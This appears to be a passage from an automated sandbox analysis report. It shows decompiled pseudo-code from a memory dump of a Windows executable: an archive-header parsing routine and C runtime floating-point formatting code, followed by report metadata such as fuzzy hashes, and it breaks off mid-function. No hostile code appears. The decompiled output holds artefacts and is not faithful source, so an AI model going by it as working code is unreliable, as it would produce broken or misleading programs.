          				unsigned int _t502;
          				void* _t509;
          				void* _t517;
          				signed int _t520;
          				void* _t521;
          				signed int _t531;
          				unsigned int _t534;
          				void* _t539;
          				intOrPtr _t543;
          				void* _t544;
          				void* _t545;
          				void* _t546;
          				intOrPtr _t556;
          
          				_t396 = __ecx;
          				_t546 = _t545 - 0x68;
          				E0020D870(E002211A9, _t544);
          				E0020D940();
          				_t394 = _t396;
          				E001FC223(_t544 + 0x30, _t394);
          				 *(_t544 + 0x60) = 0;
          				 *((intOrPtr*)(_t544 - 4)) = 0;
          				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
          					L15:
          					 *((char*)(_t544 + 0x6a)) = 0;
          					L16:
          					if(E001FC42E(_t498, 7) >= 7) {
          						 *(_t394 + 0x21f4) = 0;
          						_t509 = _t394 + 0x21e4;
          						 *_t509 = E001FC29E(_t544 + 0x30);
          						_t531 = E001FC40A(_t544 + 0x30, 4);
          						_t242 = E001FC39E(_t498);
          						__eflags = _t242 | _t498;
          						if((_t242 | _t498) == 0) {
          							L85:
          							E001F1EF8(_t394);
          							L86:
          							E001F159C(_t544 + 0x30);
          							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
          							return  *(_t544 + 0x60);
          						}
          						__eflags = _t531;
          						if(_t531 == 0) {
          							goto L85;
          						}
          						_t42 = _t531 - 3; // -3
          						_t534 = _t531 + 4 + _t242;
          						_t409 = _t42 + _t242;
          						__eflags = _t409;
          						 *(_t544 + 0x64) = _t534;
          						if(_t409 < 0) {
          							goto L85;
          						}
          						__eflags = _t534 - 7;
          						if(_t534 < 7) {
          							goto L85;
          						}
          						E001FC42E(_t498, _t409);
          						__eflags =  *(_t544 + 0x48) - _t534;
          						if( *(_t544 + 0x48) < _t534) {
          							goto L17;
          						}
          						_t248 = E001FC37E(_t544 + 0x30);
          						 *(_t394 + 0x21e8) = E001FC39E(_t498);
          						_t250 = E001FC39E(_t498);
          						 *(_t394 + 0x21ec) = _t250;
          						__eflags =  *_t509 - _t248;
          						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
          						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
          						_t254 =  *(_t394 + 0x21e8);
          						 *(_t394 + 0x21dc) = _t254;
          						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
          						 *(_t544 + 0x6b) = _t255;
          						__eflags = _t255;
          						if(_t255 == 0) {
          							L26:
          							_t256 = 0;
          							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
          							 *(_t544 + 0x58) = 0;
          							 *(_t544 + 0x54) = 0;
          							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
          								L30:
          								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
          								_t536 = _t256;
          								 *(_t544 + 0x64) = _t256;
          								 *(_t544 + 0x5c) = _t256;
          								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
          									_t362 = E001FC39E(_t498);
          									_t536 = _t362;
          									 *(_t544 + 0x64) = _t362;
          									 *(_t544 + 0x5c) = _t498;
          								}
          								_t257 = E001F1901(_t394,  *(_t394 + 0x21f0));
          								_t499 = 0;
          								asm("adc eax, edx");
          								 *((intOrPtr*)(_t394 + 0x6ca8)) = E001F3CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
          								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
          								_t500 =  *(_t394 + 0x21e8);
          								__eflags = _t500 - 1;
          								if(__eflags == 0) {
          									E001FA96C(_t394 + 0x2208);
          									_t419 = 5;
          									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
          									_t501 = E001FC39E(_t500);
          									 *(_t394 + 0x6cb5) = _t501 & 1;
          									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
          									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
          									_t431 = 1;
          									 *((char*)(_t394 + 0x6cba)) = 1;
          									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
          									_t270 = 0;
          									 *((char*)(_t394 + 0x6cb8)) = 0;
          									__eflags = _t501 & 0x00000002;
          									if((_t501 & 0x00000002) == 0) {
          										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
          									} else {
          										 *((intOrPtr*)(_t394 + 0x6cd8)) = E001FC39E(_t501);
          										_t270 = 0;
          										_t431 = 1;
          									}
          									__eflags =  *(_t394 + 0x6cb5);
          									if( *(_t394 + 0x6cb5) == 0) {
          										L81:
          										_t431 = _t270;
          										goto L82;
          									} else {
          										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
          										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
          											L82:
          											 *((char*)(_t394 + 0x6cb9)) = _t431;
          											_t432 =  *(_t544 + 0x58);
          											__eflags = _t432 |  *(_t544 + 0x54);
          											if((_t432 |  *(_t544 + 0x54)) != 0) {
          												E001F200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
          											}
          											L84:
          											 *(_t544 + 0x60) =  *(_t544 + 0x48);
          											goto L86;
          										}
          										goto L81;
          									}
          								}
          								if(__eflags <= 0) {
          									goto L84;
          								}
          								__eflags = _t500 - 3;
          								if(_t500 <= 3) {
          									__eflags = _t500 - 2;
          									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
          									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
          									 *(_t544 + 0x2c) = _t517;
          									E001FA8D2(_t517, 0);
          									_t437 = 5;
          									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
          									_t539 =  *(_t544 + 0x2c);
          									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
          									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
          									 *((char*)(_t539 + 0x10f9)) = 1;
          									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
          									 *(_t539 + 0x1094) = E001FC39E(_t500);
          									 *(_t539 + 0x1060) = E001FC39E(_t500);
          									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
          									__eflags = _t289;
          									 *(_t539 + 0x1064) = _t500;
          									 *(_t539 + 0x109a) = _t289;
          									if(_t289 != 0) {
          										 *(_t539 + 0x1060) = 0x7fffffff;
          										 *(_t539 + 0x1064) = 0x7fffffff;
          									}
          									_t441 =  *(_t539 + 0x105c);
          									_t520 =  *(_t539 + 0x1064);
          									_t290 =  *(_t539 + 0x1058);
          									_t502 =  *(_t539 + 0x1060);
          									__eflags = _t441 - _t520;
          									if(__eflags < 0) {
          										L51:
          										_t290 = _t502;
          										_t441 = _t520;
          										goto L52;
          									} else {
          										if(__eflags > 0) {
          											L52:
          											 *(_t539 + 0x106c) = _t441;
          											 *(_t539 + 0x1068) = _t290;
          											_t291 = E001FC39E(_t502);
          											__eflags =  *(_t539 + 0x1094) & 0x00000002;
          											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
          											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
          												E00200A25(_t539 + 0x1040, _t502, E001FC29E(_t544 + 0x30), 0);
          											}
          											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
          											__eflags =  *(_t539 + 0x1094) & 0x00000004;
          											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
          												 *(_t539 + 0x1070) = 2;
          												 *((intOrPtr*)(_t539 + 0x1074)) = E001FC29E(_t544 + 0x30);
          											}
          											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
          											_t292 = E001FC39E(_t502);
          											 *(_t544 + 0x64) = _t292;
          											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
          											_t449 = (_t292 & 0x0000003f) + 0x32;
          											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
          											__eflags = _t449 - 0x32;
          											if(_t449 != 0x32) {
          												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
          											}
          											 *((char*)(_t539 + 0x18)) = E001FC39E(_t502);
          											_t521 = E001FC39E(_t502);
          											 *(_t539 + 0x10fc) = 2;
          											_t295 =  *((intOrPtr*)(_t539 + 0x18));
          											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
          											__eflags = _t295 - 1;
          											if(_t295 != 1) {
          												__eflags = _t295;
          												if(_t295 == 0) {
          													_t177 = _t539 + 0x10fc;
          													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
          													__eflags =  *_t177;
          												}
          											} else {
          												 *(_t539 + 0x10fc) = 1;
          											}
          											_t455 =  *(_t539 + 8);
          											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
          											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
          											__eflags =  *(_t544 + 0x60) - 2;
          											_t458 =  *(_t544 + 0x64);
          											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
          											if( *(_t544 + 0x60) != 2) {
          												L65:
          												_t302 = 0;
          												__eflags = 0;
          												goto L66;
          											} else {
          												__eflags = _t458 & 0x00000040;
          												if((_t458 & 0x00000040) == 0) {
          													goto L65;
          												}
          												_t302 = 1;
          												L66:
          												 *((char*)(_t539 + 0x10f0)) = _t302;
          												_t304 =  *(_t539 + 0x1094) & 1;
          												 *(_t539 + 0x10f1) = _t304;
          												asm("sbb eax, eax");
          												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
          												asm("sbb eax, eax");
          												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
          												__eflags = _t521 - 0x1fff;
          												if(_t521 >= 0x1fff) {
          													_t521 = 0x1fff;
          												}
          												E001FC300(_t544 + 0x30, _t544 - 0x2074, _t521);
          												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
          												_push(0x800);
          												_t522 = _t539 + 0x28;
          												_push(_t539 + 0x28);
          												_push(_t544 - 0x2074);
          												E00201094();
          												_t462 =  *(_t544 + 0x58);
          												__eflags = _t462 |  *(_t544 + 0x54);
          												if((_t462 |  *(_t544 + 0x54)) != 0) {
          													E001F200C(_t394, _t544 + 0x30, _t462, _t539);
          												}
          												_t319 =  *(_t544 + 0x60);
          												__eflags =  *(_t544 + 0x60) - 2;
          												if( *(_t544 + 0x60) != 2) {
          													L72:
          													_t320 = E00212B69(_t319, _t522, L"CMT");
          													__eflags = _t320;
          													if(_t320 == 0) {
          														 *((char*)(_t394 + 0x6cb6)) = 1;
          													}
          													goto L74;
          												} else {
          													E001F1F3D(_t394, _t539);
          													_t319 =  *(_t544 + 0x60);
          													__eflags =  *(_t544 + 0x60) - 2;
          													if( *(_t544 + 0x60) == 2) {
          														L74:
          														__eflags =  *(_t544 + 0x6b);
          														if(__eflags != 0) {
          															E001F6BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
          														}
          														goto L84;
          													}
          													goto L72;
          												}
          											}
          										}
          										__eflags = _t290 - _t502;
          										if(_t290 > _t502) {
          											goto L52;
          										}
          										goto L51;
          									}
          								}
          								__eflags = _t500 - 4;
          								if(_t500 == 4) {
          									_t470 = 5;
          									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
          									_t331 = E001FC39E(_t500);
          									__eflags = _t331;
          									if(_t331 == 0) {
          										 *(_t394 + 0x225c) = E001FC39E(_t500) & 0x00000001;
          										_t335 = E001FC251(_t544 + 0x30) & 0x000000ff;
          										 *(_t394 + 0x2260) = _t335;
          										__eflags = _t335 - 0x18;
          										if(_t335 <= 0x18) {
          											E001FC300(_t544 + 0x30, _t394 + 0x2264, 0x10);
          											__eflags =  *(_t394 + 0x225c);
          											if( *(_t394 + 0x225c) != 0) {
          												E001FC300(_t544 + 0x30, _t394 + 0x2274, 8);
          												E001FC300(_t544 + 0x30, _t544 + 0x64, 4);
          												E001FF524(_t544 - 0x74);
          												E001FF56A(_t544 - 0x74, _t394 + 0x2274, 8);
          												_push(_t544 + 8);
          												E001FF435(_t544 - 0x74);
          												_t350 = E0020F3CA(_t544 + 0x64, _t544 + 8, 4);
          												asm("sbb al, al");
          												_t352 =  ~_t350 + 1;
          												__eflags = _t352;
          												 *(_t394 + 0x225c) = _t352;
          											}
          											 *((char*)(_t394 + 0x6cbc)) = 1;
          											goto L84;
          										}
          										_push(_t335);
          										_push(L"hc%u");
          										L40:
          										_push(0x14);
          										_push(_t544);
          										E001F3E41();
          										E001F3DEC(_t394, _t394 + 0x1e, _t544);
          										goto L86;
          									}
          									_push(_t331);
          									_push(L"h%u");
          									goto L40;
          								}
          								__eflags = _t500 - 5;
          								if(_t500 == 5) {
          									_t479 = _t500;
          									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
          									 *(_t394 + 0x45ac) = E001FC39E(_t500) & 0x00000001;
          									 *((short*)(_t394 + 0x45ae)) = 0;
          									 *((char*)(_t394 + 0x45ad)) = 0;
          								}
          								goto L84;
          							}
          							_t484 = E001FC39E(_t498);
          							 *(_t544 + 0x54) = _t498;
          							_t256 = 0;
          							 *(_t544 + 0x58) = _t484;
          							__eflags = _t498;
          							if(__eflags < 0) {
          								goto L30;
          							}
          							if(__eflags > 0) {
          								goto L85;
          							}
          							__eflags = _t484 -  *(_t394 + 0x21f0);
          							if(_t484 >=  *(_t394 + 0x21f0)) {
          								goto L85;
          							}
          							goto L30;
          						}
          						E001F1EF8(_t394);
          						 *((char*)(_t394 + 0x6cc4)) = 1;
          						E001F6E03(0x2300e0, 3);
          						__eflags =  *((char*)(_t544 + 0x6a));
          						if(__eflags == 0) {
          							goto L26;
          						} else {
          							E001F6BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
          							 *((char*)(_t394 + 0x6cc5)) = 1;
          							goto L86;
          						}
          					}
          					L17:
          					E001F3DAB(_t394, _t498);
          					goto L86;
          				}
          				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
          				asm("adc eax, ecx");
          				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
          				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
          					goto L15;
          				} else {
          					_push(0x10);
          					_push(_t544 + 0x18);
          					 *((char*)(_t544 + 0x6a)) = 1;
          					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
          						goto L17;
          					}
          					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
          						L7:
          						 *(_t544 + 0x6b) = 1;
          						L8:
          						E001F3C40(_t394);
          						_t529 = _t394 + 0x2264;
          						_t543 = _t394 + 0x1024;
          						E001F607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
          						if( *(_t394 + 0x225c) == 0) {
          							L13:
          							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
          							goto L16;
          						} else {
          							_t378 = _t394 + 0x2274;
          							while(1) {
          								_t380 = E0020F3CA(_t544 + 0x28, _t378, 8);
          								_t546 = _t546 + 0xc;
          								if(_t380 == 0) {
          									goto L13;
          								}
          								_t563 =  *(_t544 + 0x6b);
          								_t381 = _t394 + 0x1e;
          								_push(_t381);
          								_push(_t381);
          								if( *(_t544 + 0x6b) != 0) {
          									_push(6);
          									E001F6BF5(__eflags);
          									 *((char*)(_t394 + 0x6cc5)) = 1;
          									E001F6E03(0x2300e0, 0xb);
          									goto L86;
          								}
          								_push(0x7d);
          								E001F6BF5(_t563);
          								E001FE797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
          								E001F3C40(_t394);
          								E001F607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
          								_t378 = _t394 + 0x2274;
          								if( *(_t394 + 0x225c) != 0) {
          									continue;
          								}
          								goto L13;
          							}
          							goto L13;
          						}
          					}
          					_t392 = E00200FBA();
          					 *(_t544 + 0x6b) = 0;
          					if(_t392 == 0) {
          						goto L8;
          					}
          					goto L7;
          				}
          			}

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: H_prolog_memcmp
          • String ID: CMT$h%u$hc%u
          • API String ID: 3004599000-3282847064
          • Opcode ID: 885904fe8f611a1efe69967dbac9fd1e9874720cf28055eced20884e4b101c79
          • Instruction ID: 0532ac45716c7b41ac15df95d514a5763e9e4ea1b1c56f536d32707657f1a327
          • Opcode Fuzzy Hash: 885904fe8f611a1efe69967dbac9fd1e9874720cf28055eced20884e4b101c79
          • Instruction Fuzzy Hash: C132D17151038C9FDF18DF74C885AFA37A5AF64300F044579FE5A8B286DB74AA49CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 68%
          			E0021C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
          				signed int _v8;
          				signed int _v32;
          				signed int _v36;
          				char _v460;
          				signed int _v464;
          				void _v468;
          				signed int _v472;
          				signed int _v932;
          				signed int _v936;
          				signed int _v1392;
          				signed int _v1396;
          				signed int _v1400;
          				char _v1860;
          				signed int _v1864;
          				signed int _v1865;
          				signed int _v1872;
          				signed int _v1876;
          				signed int _v1880;
          				signed int _v1884;
          				signed int _v1888;
          				signed int _v1892;
          				signed int _v1896;
          				intOrPtr _v1900;
          				signed int _v1904;
          				signed int _v1908;
          				signed int _v1912;
          				signed int _v1916;
          				signed int _v1920;
          				signed int _v1924;
          				signed int _v1928;
          				char _v1936;
          				char _v1944;
          				char _v2404;
          				signed int _v2408;
          				signed int _t743;
          				signed int _t753;
          				signed int _t754;
          				intOrPtr _t763;
          				signed int _t764;
          				intOrPtr _t767;
          				intOrPtr _t770;
          				intOrPtr _t772;
          				intOrPtr _t773;
          				void* _t774;
          				signed int _t777;
          				signed int _t778;
          				signed int _t784;
          				signed int _t790;
          				intOrPtr _t792;
          				void* _t793;
          				signed int _t794;
          				signed int _t795;
          				signed int _t796;
          				signed int _t805;
          				signed int _t810;
          				signed int _t811;
          				signed int _t812;
          				signed int _t815;
          				signed int _t816;
          				signed int _t817;
          				signed int _t819;
          				signed int _t820;
          				signed int _t825;
          				signed int _t826;
          				signed int _t832;
          				signed int _t833;
          				signed int _t836;
          				signed int _t841;
          				signed int _t849;
          				signed int* _t852;
          				signed int _t856;
          				signed int _t867;
          				signed int _t868;
          				signed int _t870;
          				char* _t871;
          				signed int _t874;
          				signed int _t878;
          				signed int _t879;
          				signed int _t884;
          				signed int _t886;
          				signed int _t891;
          				signed int _t900;
          				signed int _t903;
          				signed int _t905;
          				signed int _t908;
          				signed int _t909;
          				signed int _t910;
          				signed int _t913;
          				signed int _t926;
          				signed int _t927;
          				signed int _t929;
          				char* _t930;
          				signed int _t933;
          				signed int _t937;
          				signed int _t938;
          				signed int* _t940;
          				signed int _t943;
          				signed int _t945;
          				signed int _t950;
          				signed int _t958;
          				signed int _t961;
          				signed int _t965;
          				signed int* _t972;
          				intOrPtr _t974;
          				void* _t975;
          				intOrPtr* _t977;
          				signed int* _t981;
          				unsigned int _t992;
          				signed int _t993;
          				void* _t996;
          				signed int _t997;
          				void* _t999;
          				signed int _t1000;
          				signed int _t1001;
          				signed int _t1002;
          				signed int _t1012;
          				signed int _t1017;
          				signed int _t1020;
          				unsigned int _t1023;
          				signed int _t1024;
          				void* _t1027;
          				signed int _t1028;
          				void* _t1030;
          				signed int _t1031;
          				signed int _t1032;
          				signed int _t1033;
          				signed int _t1038;
          				signed int* _t1043;
          				signed int _t1045;
          				signed int _t1055;
          				void _t1058;
          				signed int _t1061;
          				void* _t1064;
          				void* _t1071;
          				signed int _t1077;
          				signed int _t1078;
          				signed int _t1081;
          				signed int _t1082;
          				signed int _t1084;
          				signed int _t1085;
          				signed int _t1086;
          				signed int _t1090;
          				signed int _t1094;
          				signed int _t1095;
          				signed int _t1096;
          				signed int _t1098;
          				signed int _t1099;
          				signed int _t1100;
          				signed int _t1101;
          				signed int _t1102;
          				signed int _t1103;
          				signed int _t1105;
          				signed int _t1106;
          				signed int _t1107;
          				signed int _t1108;
          				signed int _t1109;
          				signed int _t1110;
          				unsigned int _t1111;
          				void* _t1114;
          				intOrPtr _t1116;
          				signed int _t1117;
          				signed int _t1118;
          				signed int _t1119;
          				signed int* _t1123;
          				void* _t1127;
          				void* _t1128;
          				signed int _t1129;
          				signed int _t1130;
          				signed int _t1131;
          				signed int _t1134;
          				signed int _t1135;
          				signed int _t1140;
          				void* _t1142;
          				signed int _t1143;
          				signed int _t1146;
          				char _t1151;
          				signed int _t1153;
          				signed int _t1154;
          				signed int _t1155;
          				signed int _t1156;
          				signed int _t1157;
          				signed int _t1158;
          				signed int _t1159;
          				signed int _t1163;
          				signed int _t1164;
          				signed int _t1165;
          				signed int _t1166;
          				signed int _t1167;
          				unsigned int _t1170;
          				void* _t1174;
          				void* _t1175;
          				unsigned int _t1176;
          				signed int _t1181;
          				signed int _t1182;
          				signed int _t1184;
          				signed int _t1185;
          				intOrPtr* _t1187;
          				signed int _t1188;
          				signed int _t1190;
          				signed int _t1191;
          				signed int _t1194;
          				signed int _t1196;
          				signed int _t1197;
          				void* _t1198;
          				signed int _t1199;
          				signed int _t1200;
          				signed int _t1201;
          				void* _t1204;
          				signed int _t1205;
          				signed int _t1206;
          				signed int _t1207;
          				signed int _t1208;
          				signed int _t1209;
          				signed int* _t1212;
          				signed int _t1213;
          				signed int _t1214;
          				signed int _t1215;
          				signed int _t1216;
          				intOrPtr* _t1218;
          				intOrPtr* _t1219;
          				signed int _t1221;
          				signed int _t1223;
          				signed int _t1226;
          				signed int _t1232;
          				signed int _t1236;
          				signed int _t1237;
          				signed int _t1242;
          				signed int _t1245;
          				signed int _t1246;
          				signed int _t1247;
          				signed int _t1248;
          				signed int _t1249;
          				signed int _t1250;
          				signed int _t1252;
          				signed int _t1253;
          				signed int _t1254;
          				signed int _t1255;
          				signed int _t1257;
          				signed int _t1258;
          				signed int _t1259;
          				signed int _t1260;
          				signed int _t1261;
          				signed int _t1263;
          				signed int _t1264;
          				signed int _t1266;
          				signed int _t1268;
          				signed int _t1270;
          				signed int _t1273;
          				signed int _t1275;
          				signed int* _t1276;
          				signed int* _t1279;
          				signed int _t1288;
          
          				_t1142 = __edx;
          				_t1273 = _t1275;
          				_t1276 = _t1275 - 0x964;
          				_t743 =  *0x22d668; // 0x4319796a
          				_v8 = _t743 ^ _t1273;
          				_t1055 = _a20;
          				_push(__esi);
          				_push(__edi);
          				_t1187 = _a16;
          				_v1924 = _t1187;
          				_v1920 = _t1055;
          				E0021C078( &_v1944, __eflags);
          				_t1236 = _a8;
          				_t748 = 0x2d;
          				if((_t1236 & 0x80000000) == 0) {
          					_t748 = 0x120;
          				}
          				 *_t1187 = _t748;
          				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
          				_t1188 = _a4;
          				if((_t1236 & 0x7ff00000) != 0) {
          					L5:
          					_t753 = E002186BF( &_a4);
          					_pop(_t1070);
          					__eflags = _t753;
          					if(_t753 != 0) {
          						_t1070 = _v1924;
          						 *((intOrPtr*)(_v1924 + 4)) = 1;
          					}
          					_t754 = _t753 - 1;
          					__eflags = _t754;
          					if(_t754 == 0) {
          						_push("1#INF");
          						goto L308;
          					} else {
          						_t777 = _t754 - 1;
          						__eflags = _t777;
          						if(_t777 == 0) {
          							_push("1#QNAN");
          							goto L308;
          						} else {
          							_t778 = _t777 - 1;
          							__eflags = _t778;
          							if(_t778 == 0) {
          								_push("1#SNAN");
          								goto L308;
          							} else {
          								__eflags = _t778 == 1;
          								if(_t778 == 1) {
          									_push("1#IND");
          									goto L308;
          								} else {
          									_v1928 = _v1928 & 0x00000000;
          									_a4 = _t1188;
          									_a8 = _t1236 & 0x7fffffff;
          									_t1288 = _a4;
          									asm("fst qword [ebp-0x768]");
          									_t1190 = _v1896;
          									_v1916 = _a12 + 1;
          									_t1077 = _t1190 >> 0x14;
          									_t784 = _t1077 & 0x000007ff;
          									__eflags = _t784;
          									if(_t784 != 0) {
          										_t1143 = 0;
          										_t784 = 0;
          										__eflags = 0;
          									} else {
          										_t1143 = 1;
          									}
          									_t1191 = _t1190 & 0x000fffff;
          									_t1058 = _v1900 + _t784;
          									asm("adc edi, esi");
          									__eflags = _t1143;
          									_t1078 = _t1077 & 0x000007ff;
          									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
          									_v1872 = _t1242;
          									E0021E0C0(_t1078, _t1288);
          									_push(_t1078);
          									_push(_t1078);
          									 *_t1276 = _t1288;
          									_t790 = E00220F10(E0021E1D0(_t1191, _t1242), _t1288);
          									_v1904 = _t790;
          									__eflags = _t790 - 0x7fffffff;
          									if(_t790 == 0x7fffffff) {
          										L16:
          										__eflags = 0;
          										_v1904 = 0;
          									} else {
          										__eflags = _t790 - 0x80000000;
          										if(_t790 == 0x80000000) {
          											goto L16;
          										}
          									}
          									_v468 = _t1058;
          									__eflags = _t1191;
          									_v464 = _t1191;
          									_t1061 = (0 | _t1191 != 0x00000000) + 1;
          									_v472 = _t1061;
          									__eflags = _t1242;
          									if(_t1242 < 0) {
          										__eflags = _t1242 - 0xfffffc02;
          										if(_t1242 == 0xfffffc02) {
          											L101:
          											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
          											_t195 =  &_v1896;
          											 *_t195 = _v1896 & 0x00000000;
          											__eflags =  *_t195;
          											asm("bsr eax, eax");
          											if( *_t195 == 0) {
          												_t1081 = 0;
          												__eflags = 0;
          											} else {
          												_t1081 = _t792 + 1;
          											}
          											_t793 = 0x20;
          											_t794 = _t793 - _t1081;
          											__eflags = _t794 - 1;
          											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
          											__eflags = _t1061 - 0x73;
          											_v1865 = _t795;
          											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
          											__eflags = _t1061 - 0x73;
          											if(_t1061 != 0x73) {
          												L107:
          												_t796 = 0;
          												__eflags = 0;
          											} else {
          												__eflags = _t795;
          												if(_t795 == 0) {
          													goto L107;
          												} else {
          													_t796 = 1;
          												}
          											}
          											__eflags = _t1082;
          											if(_t1082 != 0) {
          												L126:
          												_v1400 = _v1400 & 0x00000000;
          												_t224 =  &_v472;
          												 *_t224 = _v472 & 0x00000000;
          												__eflags =  *_t224;
          												E0021AA64( &_v468, 0x1cc,  &_v1396, 0);
          												_t1276 =  &(_t1276[4]);
          											} else {
          												__eflags = _t796;
          												if(_t796 != 0) {
          													goto L126;
          												} else {
          													_t1109 = 0x72;
          													__eflags = _t1061 - _t1109;
          													if(_t1061 < _t1109) {
          														_t1109 = _t1061;
          													}
          													__eflags = _t1109 - 0xffffffff;
          													if(_t1109 != 0xffffffff) {
          														_t1260 = _t1109;
          														_t1218 =  &_v468 + _t1109 * 4;
          														_v1880 = _t1218;
          														while(1) {
          															__eflags = _t1260 - _t1061;
          															if(_t1260 >= _t1061) {
          																_t208 =  &_v1876;
          																 *_t208 = _v1876 & 0x00000000;
          																__eflags =  *_t208;
          															} else {
          																_v1876 =  *_t1218;
          															}
          															_t210 = _t1260 - 1; // 0x70
          															__eflags = _t210 - _t1061;
          															if(_t210 >= _t1061) {
          																_t1170 = 0;
          																__eflags = 0;
          															} else {
          																_t1170 =  *(_t1218 - 4);
          															}
          															_t1218 = _t1218 - 4;
          															_t972 = _v1880;
          															_t1260 = _t1260 - 1;
          															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
          															_v1880 = _t972 - 4;
          															__eflags = _t1260 - 0xffffffff;
          															if(_t1260 == 0xffffffff) {
          																break;
          															}
          															_t1061 = _v472;
          														}
          														_t1242 = _v1872;
          													}
          													__eflags = _v1865;
          													if(_v1865 == 0) {
          														_v472 = _t1109;
          													} else {
          														_t218 = _t1109 + 1; // 0x73
          														_v472 = _t218;
          													}
          												}
          											}
          											_t1194 = 1 - _t1242;
          											E0020E920(_t1194,  &_v1396, 0, 1);
          											__eflags = 1;
          											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
          											_t805 = 0xbadbae;
          										} else {
          											_v1396 = _v1396 & 0x00000000;
          											_t1110 = 2;
          											_v1392 = 0x100000;
          											_v1400 = _t1110;
          											__eflags = _t1061 - _t1110;
          											if(_t1061 == _t1110) {
          												_t1174 = 0;
          												__eflags = 0;
          												while(1) {
          													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
          													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
          													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
          														goto L101;
          													}
          													_t1174 = _t1174 + 4;
          													__eflags = _t1174 - 8;
          													if(_t1174 != 8) {
          														continue;
          													} else {
          														_t166 =  &_v1896;
          														 *_t166 = _v1896 & 0x00000000;
          														__eflags =  *_t166;
          														asm("bsr eax, edi");
